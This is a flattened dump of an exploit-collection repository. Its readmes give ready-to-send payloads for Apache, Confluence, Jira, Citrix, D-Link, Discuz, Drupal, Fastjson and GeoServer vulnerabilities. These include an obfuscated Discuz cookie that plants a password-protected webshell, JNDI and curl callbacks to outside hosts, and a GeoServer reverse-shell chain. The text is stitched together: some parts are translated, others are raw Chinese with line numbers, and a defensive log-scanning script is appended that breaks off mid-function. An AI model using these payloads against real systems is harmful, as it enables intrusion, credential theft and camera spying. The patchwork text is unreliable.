/Apache/Apache httpd路径遍历及RCE漏洞(CVE-2021-41773)/pic/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Apache/Apache httpd路径遍历及RCE漏洞(CVE-2021-41773)/pic/2.png
--------------------------------------------------------------------------------
/Apache/Apache httpd路径遍历及RCE漏洞(CVE-2021-41773)/pic/readme.md:
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
/Apache/Apache httpd路径遍历及RCE漏洞(CVE-2021-41773)/readme.md:
--------------------------------------------------------------------------------
References:
https://github.com/blasty/CVE-2021-41773
https://zh-cn.tenable.com/blog/cve-2021-41773-path-traversal-zero-day-in-apache-http-server-exploited?tns_redirect=true

### Note
Only version 2.4.49 is affected, and only when the "require all denied" directive is not enabled (it is not enabled by default)


### Environment setup
1. Download the Docker environment configuration: https://github.com/blasty/CVE-2021-41773/archive/refs/heads/master.zip
2. Unzip it and run: docker-compose build && docker-compose up
3. Access port 8080 on the host: http://127.0.0.1:8080

### Exploitation
1. File read payload
```
/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
```
As shown below
![image](./pic/1.png)
2. RCE payload
```
/cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh
```
and add the body
```
echo Content-Type: text/plain; echo; id
```
As shown below
![image](./pic/2.png)
--------------------------------------------------------------------------------
/Atlassian/Atlassian Confluence远程代码执行漏洞(CVE-2021-26084)/pic/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Atlassian/Atlassian Confluence远程代码执行漏洞(CVE-2021-26084)/pic/1.png
--------------------------------------------------------------------------------
/Atlassian/Atlassian Confluence远程代码执行漏洞(CVE-2021-26084)/pic/readme.md:
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
/Atlassian/Atlassian Confluence远程代码执行漏洞(CVE-2021-26084)/readme.md:
--------------------------------------------------------------------------------
Remote code execution caused by OGNL expression injection

# 1. Affected versions
version < 6.13.23
6.14.0 ≤ version < 7.4.11
7.5.0 ≤ version < 7.11.6
7.12.0 ≤ version < 7.12.5

# 2. Vulnerability reproduction
Send the following request in Burp
```
POST /pages/doenterpagevariables.action HTTP/1.1
Host: xx.xx.xx.xx:8090
Connection: keep-alive
Content-Length: 599
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Google Chrome";v="92"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
Cookie: JSESSIONID=3E654B6F4ADDF325CA2203596BD0115C
cmd: perl --version

queryString=%5Cu0027%2B%23%7B%5Cu0022%5Cu0022%5B%5Cu0022class%5Cu0022%5D.forName%28%5Cu0022javax.script.ScriptEngineManager%5Cu0022%29.newInstance%28%29.getEngineByName%28%5Cu0022js%5Cu0022%29.eval%28%5Cu0022var+c%3Dcom.atlassian.core.filters.ServletContextThreadLocal.getRequest%28%29.getHeader%28%5Cu0027cmd%5Cu0027%29%3Bvar+x%3Djava.lang.Runtime.getRuntime%28%29.exec%28c%29%3Bvar+out%3Dcom.atlassian.core.filters.ServletContextThreadLocal.getResponse%28%29.getOutputStream%28%29%3Borg.apache.commons.io.IOUtils.copy%28x.getInputStream%28%29%2Cout%29%3Bout.flush%28%29%3B%5Cu0022%29%7D%2B%5Cu0027
```
As shown below
![image](./pic/1.png)
--------------------------------------------------------------------------------
/Atlassian/Atlassian Jira POC/Unauthenticated_JIRA_CVEs_to_Exploit.txt:
--------------------------------------------------------------------------------
CVE-2019-3402 (XSS)
1. Navigate to /secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search
2. Observe that the payload is getting executed.

CVE-2019-3396 (Path Traversal)
1. Try the below POST request against the JIRA target
2. POST /rest/tinymce/1/macro/preview HTTP/1.1
Host: {{Hostname}}
Accept: */*
Accept-Language: en-US,en;q=0.5
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Referer: {{Hostname}}
Content-Length: 168
Connection: close

{"contentId":"786457","macro":{"name":"widget","body":"","params":{"url":"Page Not Found - Viddler}}}

CVE-2019-11581 (Template Injection)
1. Navigate to /secure/ContactAdministrators!default.jspa
2. Try the SSTI payloads

CVE-2020-14179 (Information Disclosure)
1. Navigate to /secure/QueryComponent!Default.jspa
2. It leaks information about custom fields, custom SLAs, etc.

CVE-2020-14178 (Project Key Enumeration)
1. Navigate to /browse.
2. Observe the error message for a valid vs. an invalid project key. Apart from the enumeration, you can often get unauthenticated access to the project if the protections are not in place.

CVE-2020-14181 (User Enumeration)
1. Navigate to /secure/ViewUserHover.jspa?username=
2. Observe the response when a valid vs. an invalid username is provided.

CVE-2019-3403 (User Enumeration)
1. Navigate to /rest/api/2/user/picker?query=
2. Observe the difference in response when a valid vs. an invalid user is queried.

CVE-2019-8442 (Sensitive Information Disclosure)
1. Navigate to /s/thiscanbeanythingyouwant/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
2. Observe that the pom.xml file is accessible.

CVE-2019-8449 (User Information Disclosure)
1. Navigate to /rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true
2. Observe that user-related information is returned.

CVE-2019-8451 (SSRF)
1. Navigate to /plugins/servlet/gadgets/makeRequest?url=https://:1337@example.com

CVE-2018-20824 (XSS)
1. Navigate to /plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)
2. Observe that the payload is executed.

CVE-2017-9506 (SSRF)
1. Navigate to /plugins/servlet/oauth/users/icon-uri?consumerUri=

CVE-2019-8451 (SSRF)
1. Navigate to /plugins/servlet/gadgets/makeRequest?url=https://:1337@example.com
--------------------------------------------------------------------------------
/Atlassian/Atlassian Jira POC/Unauthenticated_JIRA_CVEs_to_Exploit.xmind:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Atlassian/Atlassian Jira POC/Unauthenticated_JIRA_CVEs_to_Exploit.xmind
--------------------------------------------------------------------------------
/Atlassian/Atlassian Jira POC/readme.md:
--------------------------------------------------------------------------------
Unauthenticated_JIRA_CVEs_to_Exploit.xmind: the mind-map file
Unauthenticated_JIRA_CVEs_to_Exploit.txt: the text extracted from the mind map
--------------------------------------------------------------------------------
/Citrix/Citrix XenMobile目录遍历漏洞(CVE-2020-8209)/0.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Citrix/Citrix XenMobile目录遍历漏洞(CVE-2020-8209)/0.png
--------------------------------------------------------------------------------
/Citrix/Citrix XenMobile目录遍历漏洞(CVE-2020-8209)/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Citrix/Citrix XenMobile目录遍历漏洞(CVE-2020-8209)/1.png
--------------------------------------------------------------------------------
/Citrix/Citrix XenMobile目录遍历漏洞(CVE-2020-8209)/readme.md:
--------------------------------------------------------------------------------
# 0x00 Software introduction
XenMobile: Citrix Endpoint Management (also known as XenMobile) is used to manage employees' mobile devices and mobile applications. Because of its Active Directory integration, it is usually deployed on the network perimeter with access to the internal network. This makes XenMobile a prime target for security research.

# 0x01 Reproduction environment
Environment used: locally built environment
Version reproduced: none

# 0x02 Environment setup
None

# 0x03 Exploitation prerequisites
None

# 0x04 Affected versions
Citrix XenMobile Server 10.12 before RP2
Citrix XenMobile Server 10.11 before RP4
Citrix XenMobile Server 10.10 before RP6
Citrix XenMobile Server before 10.9 RP5

# 0x05 Vulnerability reproduction
Attacker environment: kali_x64_en-us

Append the following path directly after the IP
```
/jsp/help-sb-download.jsp?sbFileName=../../../../etc/passwd
```
For example
```
http://www.example.com/jsp/help-sb-download.jsp?sbFileName=../../../../etc/passwd
```
As shown below
![image](./0.png)
![image](./1.png)

# 0x06 Pitfalls
None

# 0x07 References
https://swarm.ptsecurity.com/path-traversal-on-citrix-xenmobile-server/
--------------------------------------------------------------------------------
/Citrix/Citrix远程代码执行漏洞(CVE-2019-19781)/0.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Citrix/Citrix远程代码执行漏洞(CVE-2019-19781)/0.png
--------------------------------------------------------------------------------
/Citrix/Citrix远程代码执行漏洞(CVE-2019-19781)/CVE-2019-19781.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Citrix/Citrix远程代码执行漏洞(CVE-2019-19781)/CVE-2019-19781.zip
--------------------------------------------------------------------------------
/Citrix/Citrix远程代码执行漏洞(CVE-2019-19781)/readme.md:
--------------------------------------------------------------------------------
# 0x00 Software introduction
Citrix: can be understood simply as a company's VPN device accessed from the internet, or the router at the network egress, and the like

# 0x01 Reproduction environment
Environment used: test environment
Version reproduced: none

# 0x02 Environment setup
None

# 0x03 Exploitation prerequisites
None

# 0x04 Affected versions
Citrix ADC and Citrix Gateway version 13.0 all supported builds before 13.0.47.24
NetScaler ADC and NetScaler Gateway version 12.1 all supported builds before 12.1.55.18
NetScaler ADC and NetScaler Gateway version 12.0 all supported builds
before 12.0.63.13 18 | NetScaler ADC and NetScaler Gateway version 11.1 all supported builds before 11.1.63.15 19 | NetScaler ADC and NetScaler Gateway version 10.5 all supported builds before 10.5.70.12 20 | Citrix SD-WAN WANOP appliance models 4000-WO, 4100-WO, 5000-WO, and 5100-WO all supported software release builds before 10.2.6b and 11.0.3b 21 | 22 | # 0x05 漏洞复现 23 | 攻击环境:kali_x64_en-us 24 | 25 | git clone https://github.com/projectzeroindia/CVE-2019-19781 26 | cd ./CVE-2019-19781 27 | bash CVE-2019-19781.sh x.x.x.x 'ls' 28 | 如下图 29 | ![image](./0.png) 30 | 31 | # 0x06 踩坑记录 32 | 无 33 | 34 | # 0x07 参考链接 35 | 无 36 | -------------------------------------------------------------------------------- /D-Link/D-Link DCS系列监控摄像机账号密码泄露漏洞(CVE-2020-25078)/pic/0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/D-Link/D-Link DCS系列监控摄像机账号密码泄露漏洞(CVE-2020-25078)/pic/0.png -------------------------------------------------------------------------------- /D-Link/D-Link DCS系列监控摄像机账号密码泄露漏洞(CVE-2020-25078)/pic/readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /D-Link/D-Link DCS系列监控摄像机账号密码泄露漏洞(CVE-2020-25078)/readme.md: -------------------------------------------------------------------------------- 1 | # 0x00 软件介绍 2 | D-Link DCS系列:D-Link是一家台湾科技公司,中文名:友讯科技,其旗下的DCS系列是畅销的网络摄像机 3 | 4 | # 0x01 复现环境 5 | 复现环境:本地环境 6 | 复现版本:None 7 | 环境搭建: 8 | 无 9 | 10 | # 0x02 利用条件 11 | 无 12 | 13 | # 0x03 影响版本 14 | DCS-2530L 15 | DCS-2670L 16 | DCS-4603 17 | DCS-4622 18 | 等多个DCS系列系统 19 | 20 | # 0x04 漏洞复现 21 | 添加URL:/config/getuser?index=0 22 | 即访问[http://xxx.xxx.xxx.xxx/config/getuser?index=0](http://xxx.xxx.xxx.xxx/config/getuser?index=0)会泄露账号和密码 23 | 24 | 使用账号密码登陆后即可查看摄像头的监控画面 25 | ![image](./pic/0.png) 26 | 27 | # 0x05 批量脚本 28 | 无 29 | 30 | # 0x06 参考链接 
31 | https://mp.weixin.qq.com/s/b7jyA5sylkDNauQbwZKvBg 32 | -------------------------------------------------------------------------------- /Discuz/Discuz 7.x 6.x全局变量防御绕过导致远程代码执行漏洞(暂无编号)/0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Discuz/Discuz 7.x 6.x全局变量防御绕过导致远程代码执行漏洞(暂无编号)/0.png -------------------------------------------------------------------------------- /Discuz/Discuz 7.x 6.x全局变量防御绕过导致远程代码执行漏洞(暂无编号)/readme.md: -------------------------------------------------------------------------------- 1 | # 0x00 软件介绍 2 | Discuz:一款流行的论坛程序 3 | 4 | # 0x01 复现环境 5 | 使用环境:vulhub中的环境 6 | 复现版本:无 7 | 8 | # 0x02 环境搭建 9 | 靶机环境:2008_r2_standard_zh-chs 10 | 11 | 切换到对应目录下 12 | docker-compose up -d 13 | 启动后,访问[http://172.16.35.128:8080/install/](http://172.16.35.128:8080/install/)来安装discuz,数据库地址填写db,数据库名为discuz,数据库账号密码均为root 14 | 15 | # 0x03 利用条件 16 | 无 17 | 18 | # 0x04 影响版本 19 | Discuz 7.x 6.x 20 | 21 | # 0x05 漏洞复现 22 | 攻击环境:kali_x64_en-us 23 | 24 | 安装成功后,直接找一个已存在的帖子,向其发送数据包,将Cookie中的数据改为 25 | ``` 26 | GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo() 27 | ``` 28 | 请求如下 29 | ``` 30 | GET /viewthread.php?tid=13&extra=page%3D1 HTTP/1.1 31 | Host: 172.16.35.128:8080 32 | User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 33 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 34 | Accept-Language: en-US,en;q=0.5 35 | Accept-Encoding: gzip, deflate 36 | Referer: http://172.16.35.128:8080/forumdisplay.php?fid=2&page=1 37 | Connection: close 38 | Cookie: GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo() 39 | Upgrade-Insecure-Requests: 1 40 | Pragma: no-cache 41 | Cache-Control: no-cache 42 | ``` 43 | 返回如下图 44 | ![image](./0.png) 45 | 46 | 想getshell可将Cookie中的内容变为 47 | ``` 48 | 
GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=eval(Chr(102).Chr(112).Chr(117).Chr(116).Chr(115).Chr(40).Chr(102).Chr(111).Chr(112).Chr(101).Chr(110).Chr(40).Chr(39).Chr(119).Chr(102).Chr(46).Chr(112).Chr(104).Chr(112).Chr(39).Chr(44).Chr(39).Chr(119).Chr(39).Chr(41).Chr(44).Chr(39).Chr(60).Chr(63).Chr(112).Chr(104).Chr(112).Chr(32).Chr(64).Chr(101).Chr(118).Chr(97).Chr(108).Chr(40).Chr(36).Chr(95).Chr(80).Chr(79).Chr(83).Chr(84).Chr(91).Chr(108).Chr(97).Chr(108).Chr(97).Chr(108).Chr(97).Chr(93).Chr(41).Chr(63).Chr(62).Chr(39).Chr(41).Chr(59)) 49 | ``` 50 | 发送的请求如下 51 | ``` 52 | GET /viewthread.php?tid=13&extra=page%3D1 HTTP/1.1 53 | Host: 172.16.35.128:8080 54 | User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 55 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 56 | Accept-Language: en-US,en;q=0.5 57 | Accept-Encoding: gzip, deflate 58 | Referer: http://172.16.35.128:8080/forumdisplay.php?fid=2&page=1 59 | Connection: close 60 | Cookie: GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=eval(Chr(102).Chr(112).Chr(117).Chr(116).Chr(115).Chr(40).Chr(102).Chr(111).Chr(112).Chr(101).Chr(110).Chr(40).Chr(39).Chr(119).Chr(102).Chr(46).Chr(112).Chr(104).Chr(112).Chr(39).Chr(44).Chr(39).Chr(119).Chr(39).Chr(41).Chr(44).Chr(39).Chr(60).Chr(63).Chr(112).Chr(104).Chr(112).Chr(32).Chr(64).Chr(101).Chr(118).Chr(97).Chr(108).Chr(40).Chr(36).Chr(95).Chr(80).Chr(79).Chr(83).Chr(84).Chr(91).Chr(108).Chr(97).Chr(108).Chr(97).Chr(108).Chr(97).Chr(93).Chr(41).Chr(63).Chr(62).Chr(39).Chr(41).Chr(59)) 61 | Upgrade-Insecure-Requests: 1 62 | Pragma: no-cache 63 | Cache-Control: no-cache 64 | ``` 65 | 然后可使用蚁剑连接,地址http://172.16.35.128:8080/wf.php 密码lalala 66 | 67 | # 0x06 踩坑记录 68 | 无 69 | 70 | # 0x07 参考链接 71 | 无 72 | -------------------------------------------------------------------------------- /Drupal/Drupal远程代码执行漏洞(CVE-2018-7600)/0.png: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Drupal/Drupal远程代码执行漏洞(CVE-2018-7600)/0.png -------------------------------------------------------------------------------- /Drupal/Drupal远程代码执行漏洞(CVE-2018-7600)/readme.md: -------------------------------------------------------------------------------- 1 | # 0x00 复现环境 2 | 使用复现环境:https://github.com/vulhub/vulhub/tree/master/drupal/CVE-2018-7600 3 | 4 | # 0x01 利用条件 5 | 无 6 | 7 | # 0x02 影响版本 8 | 7.23<=7.x<=7.57 9 | 8.3.x<=8.3.8 10 | 8.4.x<=8.4.5 11 | 8.5.x<=8.5.0 12 | 13 | # 0x03 漏洞复现 14 | 执行“ruby ./drupalggedon2.rb http://172.16.35.128:8080” 15 | 会返回一个shell,可在返回的shell中执行命令,如下图 16 | ![image](./0.png) 17 | 18 | # 0x04 踩坑记录 19 | 坑1: 20 | 环境创建完之后,使用kali下的firefox访问127.0.0.1:8080时,burp不能抓到数据包,原因未知,解决方案:使用kali下的firefox访问局域网ip“172.16.35.128:8080” 21 | 坑2: 22 | 登录状态下使用vulhub中的poc无效,需要登出后才可执行命令id,vulhub中的poc如下: 23 | ``` 24 | POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1 25 | Host: your-ip:8080 26 | Accept-Encoding: gzip, deflate 27 | Accept: */* 28 | Accept-Language: en 29 | User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) 30 | Connection: close 31 | Content-Type: application/x-www-form-urlencoded 32 | Content-Length: 103 33 | 34 | form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=id 35 | ``` 36 | 坑3: 37 | 使用vulhub中的poc执行命令“ls”,只能看到一个文件“web.config”,执行命令“ls -a /”也只能看到一个文件“var” 38 | 39 | # 参考链接 40 | https://github.com/vulhub/vulhub/tree/master/drupal/CVE-2018-7600 41 | -------------------------------------------------------------------------------- /Fastjson/Fastjson漏洞集合.md: -------------------------------------------------------------------------------- 1 | ### 版本探测 2 | ```text 3 | {"@type":"java.lang.AutoCloseable" 4 | 5 | ["test":1] 6 | 7 | 
["@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"rmi://qiyisrm.uustay.dns.yoyostay.top/exploit"] 8 | 9 | 参考链接: 10 | https://blog.csdn.net/weixin_43510203/article/details/115277081 11 | https://b1ue.cn/archives/402.html 12 | ``` 13 | 14 | ### 漏洞版本梳理 15 | ```text 16 | 自2017年,1.2.24版本,官方主动爆出反序列化漏洞后,安全研究员开始了fastjson漏洞之旅 17 | 官方也在1.2.24之后增加了AutoType限制 18 | 19 | Fastjson <= 1.2.47 20 | https://blog.csdn.net/weixin_39190897/article/details/107284989 21 | https://zeo.cool/2020/07/04/红队武器库!fastjson小于1.2.68全漏洞RCE利用exp/ 22 | 23 | Fastjson <= 1.2.68 24 | 自1.2.68起,增加了SafeMode模式 25 | 26 | Fastjson <= 1.2.80 27 | 在特定条件下可绕过AutoType限制,反序列化RCE 28 | 29 | 最新版1.2.83发布于2022年05月23日 30 | ``` 31 | 32 | ### 漏洞利用 33 | ```text 34 | demo 35 | {{"@type":"java.net.URL","val":"http://.dnslog.cn"}:0 36 | 37 | bypass长亭SafeLine 38 | {"@type":\b"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://127.0.0.1:9999","autoCommit":true}} 39 | ``` -------------------------------------------------------------------------------- /GeoServer/GeoServer CVE-2024-36401漏洞复现及武器化/GeoServer CVE-2024-36401漏洞复现及武器化.md: -------------------------------------------------------------------------------- 1 | # 0x01 漏洞复现 2 | ## POST 3 | ``` 4 | POST /geoserver/wfs HTTP/1.1 5 | Host: 39.98.250.47:8080 6 | Accept-Encoding: gzip, deflate, br 7 | Accept: */* 8 | Accept-Language: en-US;q=0.9,en;q=0.8 9 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36 10 | Connection: close 11 | Cache-Control: max-age=0 12 | Content-Type: application/xml 13 | Content-Length: 356 14 | 15 | 19 | 20 | exec(java.lang.Runtime.getRuntime(),'touch /tmp/success2') 21 | 22 | ``` 23 | ![image](./images/01.png) 24 | 25 | ## GET 26 | ``` 27 | GET /geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames=sf:archsites&valueReference=exec(java.lang.Runtime.getRuntime(),'touch%20/tmp/success1') HTTP/1.1 28 | Host: 39.98.250.47:8080 29 | 
Accept-Encoding: gzip, deflate, br 30 | Accept: */* 31 | Accept-Language: en-US;q=0.9,en;q=0.8 32 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36 33 | Connection: close 34 | Cache-Control: max-age=0 35 | 36 | 37 | ``` 38 | ![image](./images/02.png) 39 | 40 | ## 结果 41 | 成功创建文件success1和success2 42 | ![image](./images/03.png) 43 | 值得注意的是,typeNames必须存在,我们可以在Web页面中找到当前服务器中的所有Types 44 | 45 | 46 | # 0x02 漏洞武器化 47 | ## POST 48 | ### DNSLog 49 | 50 | 需要注意ping pvip4zip.eyes.sh会报错,需要用curl pvip4zip.eyes.sh 51 | 52 | ``` 53 | POST /geoserver/wfs HTTP/1.1 54 | Host: 39.98.250.47:8080 55 | Accept-Encoding: gzip, deflate, br 56 | Accept: */* 57 | Accept-Language: en-US;q=0.9,en;q=0.8 58 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36 59 | Connection: close 60 | Cache-Control: max-age=0 61 | Content-Type: application/xml 62 | Content-Length: 358 63 | 64 | 68 | 69 | exec(java.lang.Runtime.getRuntime(),'curl pvip4zip.eyes.sh') 70 | 71 | ``` 72 | 成功收到dnslog记录 73 | ![image](./images/04.png) 74 | 75 | ### 反弹Shell 76 | 直接插入反弹shell的命令会提示请求解析失败 77 | ![image](./images/07.png) 78 | 79 | base64编码后,返回正常 80 | ![image](./images/06.png) 81 | 82 | 成功收到反弹shell 83 | ![image](./images/05.png) -------------------------------------------------------------------------------- /GeoServer/GeoServer CVE-2024-36401漏洞复现及武器化/images/01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/GeoServer/GeoServer CVE-2024-36401漏洞复现及武器化/images/01.png -------------------------------------------------------------------------------- /GeoServer/GeoServer CVE-2024-36401漏洞复现及武器化/images/02.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/GeoServer/GeoServer CVE-2024-36401漏洞复现及武器化/images/02.png -------------------------------------------------------------------------------- /GeoServer/GeoServer CVE-2024-36401漏洞复现及武器化/images/03.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/GeoServer/GeoServer CVE-2024-36401漏洞复现及武器化/images/03.png -------------------------------------------------------------------------------- /GeoServer/GeoServer CVE-2024-36401漏洞复现及武器化/images/04.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/GeoServer/GeoServer CVE-2024-36401漏洞复现及武器化/images/04.png -------------------------------------------------------------------------------- /GeoServer/GeoServer CVE-2024-36401漏洞复现及武器化/images/05.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/GeoServer/GeoServer CVE-2024-36401漏洞复现及武器化/images/05.png -------------------------------------------------------------------------------- /GeoServer/GeoServer CVE-2024-36401漏洞复现及武器化/images/06.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/GeoServer/GeoServer CVE-2024-36401漏洞复现及武器化/images/06.png -------------------------------------------------------------------------------- /GeoServer/GeoServer CVE-2024-36401漏洞复现及武器化/images/07.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/GeoServer/GeoServer CVE-2024-36401漏洞复现及武器化/images/07.png 
--------------------------------------------------------------------------------
/Git/Git泄漏漏洞(暂无编号)/0.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Git/Git泄漏漏洞(暂无编号)/0.png
--------------------------------------------------------------------------------
/Git/Git泄漏漏洞(暂无编号)/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Git/Git泄漏漏洞(暂无编号)/1.png
--------------------------------------------------------------------------------
/Git/Git泄漏漏洞(暂无编号)/GitHack-master.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Git/Git泄漏漏洞(暂无编号)/GitHack-master.zip
--------------------------------------------------------------------------------
/Git/Git泄漏漏洞(暂无编号)/readme.md:
--------------------------------------------------------------------------------
# 0x00 Software introduction
git: distributed version control system

# 0x01 Reproduction environment
Environment used: an environment from the adworld (攻防世界) CTF platform
Version reproduced: none

# 0x02 Environment setup
None

# 0x03 Exploitation prerequisites
None

# 0x04 Affected versions
None

# 0x05 Vulnerability reproduction
Attack machine: kali_x64_en-us

git clone https://github.com/lijiejie/GitHack
cd ./GitHack
python ./GitHack.py http://124.126.19.106:31232/.git/
As shown below
![image](./0.png)
![image](./1.png)

# 0x06 Pitfalls
None

# 0x07 References
None

--------------------------------------------------------------------------------
/GitLab/GitLab exiftool未授权远程命令执行漏洞(CVE-2021-22205)/pic/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/GitLab/GitLab exiftool未授权远程命令执行漏洞(CVE-2021-22205)/pic/1.png
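The Jira, XenMobile, D-Link and Git leak readmes above all describe unauthenticated requests to fixed paths, which is exactly what a defender can look for in web-server access logs. The following is an added example, not code from the ybdt/exp-hub repository: it parses combined-format log lines (constructed samples, RFC 5737 addresses), decodes the request target so encoded traversal sequences are caught, matches the paths those readmes cite, and counts how many distinct signatures each client tripped so a scanning source stands out.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Combined/common log format: client, ident, auth user, timestamp, request line, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) (?P<size>\S+)'
)

# Path signatures taken from the readmes on this page; labels name the CVEs the page cites.
SIGNATURES = [
    (re.compile(r"/rest/api/2/user/picker"), "Jira user enumeration (CVE-2019-3403)"),
    (re.compile(r"/rest/api/latest/groupuserpicker"), "Jira user info disclosure (CVE-2019-8449)"),
    (re.compile(r"/secure/ViewUserHover\.jspa"), "Jira user enumeration (CVE-2020-14181)"),
    (re.compile(r"/secure/QueryComponent!Default\.jspa"), "Jira info disclosure (CVE-2020-14179)"),
    (re.compile(r"/s/[^/]+/_/META-INF/"), "Jira pom.xml disclosure (CVE-2019-8442)"),
    (re.compile(r"/plugins/servlet/gadgets/makeRequest"), "Jira SSRF (CVE-2019-8451)"),
    (re.compile(r"/plugins/servlet/oauth/users/icon-uri"), "Jira SSRF (CVE-2017-9506)"),
    (re.compile(r"/jsp/help-sb-download\.jsp"), "XenMobile path traversal (CVE-2020-8209)"),
    (re.compile(r"/config/getuser"), "D-Link DCS credential leak (CVE-2020-25078)"),
    (re.compile(r"/\.git/"), "exposed .git directory"),
]
# Dot-dot segments anywhere in the decoded request (path or query string).
TRAVERSAL_RE = re.compile(r"\.\.[/\\]")


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    # Decode twice so that ../, %2e%2e/ and double-encoded %252e%252e/ all compare alike.
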